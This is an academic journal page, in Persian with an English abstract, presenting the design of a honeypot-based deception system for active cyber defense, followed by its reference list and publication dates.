طراحی یک سامانه فریب همکارانه و مستقل در سامانه دفاع فعال سایبری

نوع مقاله : مقاله پژوهشی

نویسندگان

1 استادیار، دانشگاه صنعتی مالک اشتر، تهران، ایران

2 دانشجوی کارشناسی ارشد، دانشگاه صنعتی مالک اشتر، تهران، ایران

چکیده

فناوری فریب سایبری بخشی از فرآیند شناسایی و پاسخگویی به حوادث سایبری است. این فناوری مهاجمان را به سمت دارایی‌های دروغین IT هدایت کرده تا تهدیدات پیشرفته را شناسایی و تجزیه و تحلیل کند. هشدارهای ایجاد شده در سامانه فریب دارای صحت بالایی است. فریب به روش‌های مختلفی صورت می‌گیرد که رویکرد دفاع فعال از جمله آن‌هاست. دفاع فعال سایبری مجموعه اقداماتی را دربر می‌گیرد که ما را در رسیدن به امنیت سایبر هدایت می‌کند. این اقدامات شامل تشخیص، تجزیه و تحلیل، شناسایی و کاهش تهدیدات نسبت به سامانه و شبکه‌های ارتباطی در زمان واقعی را شامل می‌شود. از ابزارهای دفاع فعال می‌توان به تله عسل اشاره نمود. تله عسل فریبنده‌ای است که به عمد در شبکه قرار می‌گیرد تا توسط مهاجم کاوش شود و فعالیت‌های انجام گرفته را ثبت، ردیابی و تحلیل نماید. در این تحقیق به نوع کم تعامل آن پرداخته شده است که برای شناسایی فعالیت‌های مخرب مورد استفاده قرار می‌گیرد. با توجه به ابزار و استراتژهای موجود، سامانه دفاع فعال سایبری (سدف سایبری) طراحی شده است تا به‌صورت بلادرنگ به مانیتورینگ ناهنجاری رخ داده بپردازد. سدف توانایی تفکیک سطح عملکردی مهاجمین را با توجه به IP دارا است. مباحث مربوط به فریب سایبری و تله عسل بر روی به دام انداختن مهاجم از طریق گمراه کردن، گیج کردن و ... تمرکز دارد. در حقیقت فناوری به‌‌کار رفته در سدف نوع تکامل یافته تله عسل است بدین صورت که قابلیت‌های محدود آن را گسترش می‌دهد.

کلیدواژه‌ها


عنوان مقاله [English]

A cooperative and independent deception system in the active cyber defense system

نویسندگان [English]

  • Kourosh Dadashtabar Ahmadi 1
  • mohammad mahmoudbabouei 2
1 Assistant Professor, Malik Ashtar University of Technology, Tehran, Iran
2 Master's student, Malik Ashtar University of Technology, Tehran, Iran
چکیده [English]

Cyber deception technology is a part of the process of identifying and responding to incidents. This technology helps the security team identify and analyze advanced threats by persuading an attacker to strike fake resources. The deception approach is to create a high-precision warning about high-risk behaviors. Deception occurs in a variety of ways, including an active defense approach. Active defense is an approach that is based on the establishment of measures to detect, analyze, identify and reduce threats to communication systems and networks in real time by default, which ultimately leads to cyber security. To better understand the techniques used in active defense, we can mention the Honeypot. The Honeypot is a trick that is deliberately placed on the net to be explored by an attacker in order to record, track and analyze the activities performed. In this project, we have used a low-interaction Honeypot to identify malicious activities. Using these technologies and strategies, we have designed an active cyber defense system (SDF). Taking into account the IP, this system has the capability of monitoring and real-time detection of abnormalities that occur in the form of functional level of attackers. Both the cyber deception and the honeypot concentrate on trapping the attacker by misleading, confusing, and etc. But active cyber deception (SDF) technology is an evolution of Honeypot, extending its limited capabilities.

کلیدواژه‌ها [English]

  • Honeypot
  • cyber deception
  • active cyber defense
  • low interaction

Smiley face

[1] S. Brandes, “The Newest Warfighting Domain: Cyberspace,” Synesis: A J.  Sci. , Technol. , Ethics, Policy, vol 4, bll G90-95, 2013.
[2] M. Fossi., [M1] “Symantec Internet Security Threat Report Trends for 2010,”,[M2]  Volume XVI, 2011.
[3] G. J. Rattray, “An Environmental Approach to Understanding Cyberpower,” Cyberpower and National Security, vol 10, National Defense University Press Washington, DC, bll 253–274, 2009.
[4] M. Bailey, E. Cooke, D. Watson, F. Jahanian, and N. Provos, “A Hybrid Honeypot Architecture for Scalable Network Monitoring,” Univ. Michigan, Ann Arbor, MI, USA, Tech. Rep. CSE-TR-499-04, 2004.
 [5] H. Artail, H. Safa, M. Sraj, I. Kuwatly, and Z. Al-Masri, “A Hybrid Honeypot Framework for Improving Intrusion Detection Systems in Protecting Organizational Networks,” Computers & Security, vol. 25, no. 4, pp. 274–288, 2006.
[6] M. Nawrocki, M. Wählisch, T. C. Schmidt, C. Keil, and J. Schönfelder, “A Survey on Honeypot Software and Data Analysis,” arXiv preprint arXiv:1608. 06249, 2016.
[7]  T. K. Lengyel, J. Neumann, S. Maresca, B. D. Payne, and A. Kiayias, “Virtual Machine Introspection in a Hybrid Honeypot Architecture,” In CSET, 2012. 
[8] L. Spitzner, “The Honeynet Project: Trapping the Hackers,” IEEE Security & Privacy, vol. 1, no. 2, pp. 15–23, 2003.
 [9] L. Spitzner, “Honeypots: Catching the Insider Ihreat,” In 19th Annual Computer Security Applications Conference, Proceedings, 2003, pp. 170–179.
[10] B. Cheswick, “An Evening with Berferd in which a Cracker is Lured, Endured, and Studied,” In Proc. Winter USENIX Conference, San Francisco, 1992, pp. 20–24.
 [11]   C. Stoll, The cuckoo’s egg: tracking a spy through the maze of computer espionage. Simon and Schuster, 2005. 
[12] G. Portokalidis, A. Slowinska, and H. Bos, “Argos: An Emulator for Fingerprinting Zero-day Attacks for Advertised Honeypots with Automatic Signature Generation,” ACM SIGOPS Operating Systems Review, vol. 40, no. 4, pp. 15–27, 2006.
[13] R. Rajabioun, “Cuckoo Optimization Algorithm,” Applied Soft Computing, vol. 11, no. 8, pp. 5508–5518, 2011. 
[14] D. Moore, C. Shannon, G. Voelker, and S. Savage, “Network Telescopes: Technical Report,” Cooperative Association for Internet Data Analysis (CAIDA), 2004. 
[15] A. Kirkby, “Honeynet Phase Two: Knowing Your Enemy More”, Computer Fraud & Security, vol. 2001, no. 12, pp. 8–9, 2001.
[16] D. Song, “A snapshot of global Internet worm activity,” The 14th Annual FIRST Conference on Computer Security Incident Handling and Response, [M3] 2002. 
[17] V. Yegneswaran, P. Barford, and D. Plonka, “On the Design and Use of Internet Sinks for Network Abuse Monitoring,” In International Workshop on Recent Advances in Intrusion Detection, 2004, pp. 146–165.
[18] K. M. Aghaei, S. Farshchi, and H. Shirazi, “A New Architecture for Impact Projection of Cyber-attacks Based on High Level Information Fusion in Cyber Command and Control,” Volume 9, No. 36, pp. 125-140,  [M4] 2015.
[19] M. Bailey, E. Cooke, F. Jahanian, J. Nazario, D. Watson, and Others,[M5]  “The Internet MotionS-a Distributed Blackhole Monitoring System,” In NDSS, 2005.
 [20] N. Provos and Others,[M6]  “A Virtual Honeypot Framework,” In USENIX Security Symposium, vol. 173, pp. 1–14, 2004. 
[21] B. Mphago, O. Bagwasi, B. Phofuetsile, and H. Hlomani, “Deception in Dynamic Web Application Honeypots: Case of Glastopf,” In Proceedings of the International Conference on Security and Management (SAM), p. 104, 2015. 
[22] W. Schulze, E. D. Schulze, I. Schulze, and R. Oren, “Quantification of Insect Nitrogen Utilization by the Venus Fly Trap Dionaea Muscipula Catching Prey with Highly Variable Isotope Signatures,” Journal of experimental botany, vol. 52, no. 358, pp. 1041–1049, 2001. 
[23] L. Spitzner, “Specter: A Commercial Honeypot Solution for Windows,” Acesso em, vol. 26, no. 08, 2003.
 [24] S. Poeplau and J. Gassen, “A Honeypot for Arbitrary Malware on USB Storage Devices,” 7th International Conference on Risks and Security of Internet and Systems (CRiSIS), pp. 1–8, 2012. 
[25] N. Provos and T. Holz, Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Pearson Education, 2007. 
 [26] L. K. Yan, “Virtual Honeynets Revisited,” In Proceedings from the Sixth Annual IEEE SMC Information Assurance Workshop, pp. 232–239, 2005.
[27] A. Capalik, “Next-generation Honeynet Technology with Real-time Forensics for US Defense,” In MILCOM 2007-IEEE Military Communications Conference, pp. 1–7, 2007.
[28] N. Memari, S. J. B. Hashim, and K. B. Samsudin, “Towards Virtual Honeynet Based on LXC Virtualization,” IEEE Region 10 Symposium, pp. 496–501, 2014.[M7] 
 [29] D. Sever and T. Kišasondi, “Efficiency and Security of Docker Based Honeypot Systems,” 41st International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO), pp. 1167–1173, 2018.
[30] F. Galán and D. Fernández, “Use of VNUML in Virtual Honeynets Deployment,” IX Reunión Española sobre Criptología y Seguridad de la Información (RECSI), Barcelona, Spain, 2006.
[31] F. Stumpf, A. Görlach, F. Homann, and L. Brückner, “NoSE-building Virtual Honeynets Made Easy,” In Proceedings of the 12th International Linux System Technology Conference, Hamburg, Germany, 2005. 
[32]   D. Fernández , [M8] “Distributed Virtual Scenarios Over Multi-host Linux Environments,” 5th International DMTF Academic Alliance Workshop on Systems and Virtualization Management: Standards and the Cloud (SVM), pp. 1–8, 2011.
[33] W. Fan, D. Fernández, and Z. Du, “Versatile Virtual Honeynet Management Framework,” IET Information Security, vol. 11, no. 1, pp. 38–45, 2017. 
[34] W. Y. Chin, E. P. Markatos, S. Antonatos, and S. Ioannidis, “HoneyLab: Large-scale Honeypot Deployment and Resource Sharing,” Third International Conference on Network and System Security, pp. 381–388, 2009.
[35] B. Sobesto, M. Cukier, M. A. Hiltunen, D. Kormann, G. Vesonder, and R. Berthier, “DarkNOC: Dashboard for Honeypot Management,” In LISA, 2011.
[36] W. Han, Z. Zhao, A. Doupé, and G. J. Ahn, “Honeymix: Toward SDN-based Intelligent Honeynet,” In Proceedings of the 2016 ACM International Workshop on Security in Software Defined Networks & Network Function Virtualization, pp. 1–6, 2016. 
[37]  M. Egele, T. Scholte, E. Kirda, and C. Kruegel, “A Survey on Automated Dynamic Malware-analysis Techniques and Tools,” ACM computing surveys (CSUR), vol. 44, no. 2, pp. 1–42, 2008. 
[38] L. Spitzner, “Know Your Enemy: Genii Honeynets,” The Honeynet Alliance, 2005. 
[39] W. Fan, Z. Du, D. Fernández, and V. A. Villagrá, “Enabling an Anatomic View to Investigate Honeypot Systems: A Survey,” IEEE Systems Journal, vol. 12, no. 4, pp. 3906–3919, 2017. 
[40]  K. G. Anagnostakis, S. Sidiroglou, P. Akritidis, K. Xinidis, E. Markatos, and A. D. Keromytis, “Detecting Targeted Attacks Using Shadow Honeypots,” 14th USENIX Security Symposium, [M9]  2005.
[41] S. Schindler, B. Schnor, and T. Scheffler, “Hyhoneydv6: A Hybrid Honeypot Architecture for IPV6 Networks,” International Journal of Intelligent Computing Research, vol. 6, No. 2, pp. 562-570, [M10] 2015. 
[42]   Y. M. P. Pa, S. Suzuki, K. Yoshioka, T. Matsumoto, T. Kasama, and C. Rossow, “IoTPOT: Analysing the Rise of IoT Compromises,” In 9th ${USENIX} Workshop on Offensive Technologies ({WOOT}$ 15), 2015.
[43]   A. Pashaei, M. E. Akbari, M. Z. Lighvan, and H. A. Teymorzade, “Improving the IDS Performance through Early Detection Approach in Local Area Networks Using Industrial Control Systems of Honeypot,” In 2020 IEEE International Conference on Environment and Electrical Engineering and 2020 IEEE Industrial and Commercial Power Systems Europe (EEEIC/I&CPS Europe), pp. 1–5, 2020. 
[44] A. Podhradsky, C. Casey, and P. Ceretti, “The Bluetooth Honeypot Project: Measuring and Managing Bluetooth Risks in the Workplace,” International Journal of Interdisciplinary Telecommunications and Networking (IJITN), vol. 4, no. 3, pp. 1–22, 2012. 
[45] R. Do Carmo, M. Nassar, and O. Festor, “Artemisa: An Open-source Honeypot Back-end to Support Security in VoIP Domains,” In 12th IFIP/IEEE International Symposium on Integrated Network Management (IM 2011) and Workshops, pp. 361–368, 2011.
 [46] L. Spitzner, “Know Your Enemy: Sebek2 A Kernel Based Data Capture Tool,” Recuperado a partir de http://www. honeynet. org, 2003. 
[47] C. Song, B. Hay, and J. Zhuge, “Know Your Tools: Qebek--Conceal the Monitoring,” The Honeynet Project (www. honeynet. org/sites/default/files/files/KYT-Qebek-final_v1. pdf), 2010. 
[48] C. Willems, T. Holz, and F. Freiling, “Toward Automated Dynamic Malware Analysis Using Cwsandbox,” IEEE Security & Privacy, vol. 5, no. 2, pp. 32–39, 2007. 
[49] X. Jiang and X. Wang, “‘Out-of-the-box’ Monitoring of VM-based High-Interaction Honeypots,” In International Workshop on Recent Advances in Intrusion Detection, pp. 198–218, 2007.
 [50] J. Newsome and D. X. Song, “Dynamic Taint Analysis for Automatic Detection, Analysis, and SignatureGeneration of Exploits on Commodity Software,” In NDSS, vol. 5, pp. 3–4, 2005.
[51] C. Kreibich and J. Crowcroft, “Honeycomb: Creating Intrusion Detection Signatures Using Honeypots,” ACM SIGCOMM Computer Communication Review, vol. 34, no. 1, pp. 51–56, 2004. 
[52] A. Javaid, Q. Niyaz, W. Sun, and M. Alam, “A Deep Learning Approach for Network Intrusion Detection System,” Eai Endorsed Transactions on Security and Safety, vol. 3, no. 9, p. e2, 2016.
[53] R. Sekar, A.Gupta and S.Zhou. ,  “Specification-based Anomaly Detection: A New Approach for Detecting Network Intrusions”, In Proceedings of the 9th ACM Conference on Computer and Communications Security, pp. 265–274, 2002. 
[54]  E. Kohler, R. Morris, B. Chen, J. Jannotti, and M. F. Kaashoek, “The Click Modular Router,” ACM Transactions on Computer Systems (TOCS), vol. 18, no. 3, pp. 263–297, 2000. 
[55] C. Yoon, T. Park, S. Lee, H. Kang, S. Shin, and Z. Zhang, “Enabling Security Functions with SDN: A Feasibility Study,” Computer Networks, vol. 85, pp. 19–35, 2015.
[56] R. Berthier and M. Cukier, “Honeybrid: A Hybrid Honeypot Architecture,” In USENIX Security Symposium, vol. 2008, 2008. 
[57] R. Kundel P. Stiegele, D. Tran, J. Zobel, O.Abboud, R. Hark and R.Steinmetz, “User Space Packet Schedulers: Towards Rapid Prototyping of Queue-Management Algorithms,” Electronic Communications of the EASST, vol. 80, 2021. 
[58] Y.-D. Lin, T.-B. Shih, Y.-S. Wu, and Y.-C. Lai, “Secure and Transparent Network Traffic Replay, Redirect, and Relay in a Dynamic Malware Analysis Environment,” Security and Communication Networks, vol. 7, no. 3, pp. 626–640, 2014. 
دوره 10، شماره 2 - شماره پیاپی 38
شماره پیاپی 38، فصلنامه تابستان
مهر 1401
صفحه 129-142
  • تاریخ دریافت: 01 شهریور 1400
  • تاریخ بازنگری: 19 مهر 1400
  • تاریخ پذیرش: 27 آذر 1400
  • تاریخ انتشار: 01 مهر 1401